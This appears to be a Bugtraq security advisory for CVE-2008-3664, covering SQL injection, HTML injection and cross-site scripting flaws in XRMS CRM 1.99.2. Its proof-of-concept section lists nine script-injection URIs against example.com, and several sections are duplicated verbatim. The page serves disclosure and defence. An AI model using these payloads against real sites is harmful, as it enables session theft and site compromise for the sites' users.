XRMS CRM Multiple Input Validation Vulnerabilities
BID:31008
Info
XRMS CRM Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 31008 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3664 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 04 2008 12:00AM |
| Updated: | Nov 04 2008 08:45PM |
| Credit: | Fabian Fingerle |
| Vulnerable: |
XRMS CRM XRMS 1.99.2 |
| Not Vulnerable: | |
Discussion
XRMS CRM Multiple Input Validation Vulnerabilities
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
XRMS CRM is prone to multiple input-validation vulnerabilities, including an unspecified SQL-injection issue, an HTML-injection issue, and multiple cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
XRMS CRM Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URIs are available to demonstrate the cross-site scripting issues:
http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URIs are available to demonstrate the cross-site scripting issues:
http://www.example.com/xrms/login.php?target="><script>alert(1);</script>
http://www.example.com/xrms/activities/some.php?title="><script>alert(1);</script>
http://www.example.com/xrms/companies/some.php?company_name="><script>alert(1);</script>
http://www.example.com/xrms/contacts/some.php?last_name="><script>alert(1);</script>
http://www.example.com/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
http://www.example.com/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
http://www.example.com/xrms/cases/some.php?case_title="><script>alert(1);</script>
http://www.example.com/xrms/files/some.php?file_id="><script>alert(1);</script>
http://www.example.com/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script>
Solution / Fix
XRMS CRM Multiple Input Validation Vulnerabilities
Solution:
NOTE: These issues are reported to be resolved in the CVS version of XRMS CMS as of November 3, 2008.
Symantec has not been able to confirm this information. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
NOTE: These issues are reported to be resolved in the CVS version of XRMS CMS as of November 3, 2008.
Symantec has not been able to confirm this information. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
XRMS CRM Multiple Input Validation Vulnerabilities
References:
References:
- XRMS CRM Project Page (XRMS CRM)
- Multiple Cross Site Scripting (XSS) and SQL injection Vulnerabilities in XRMS, C (Fabian Fingerle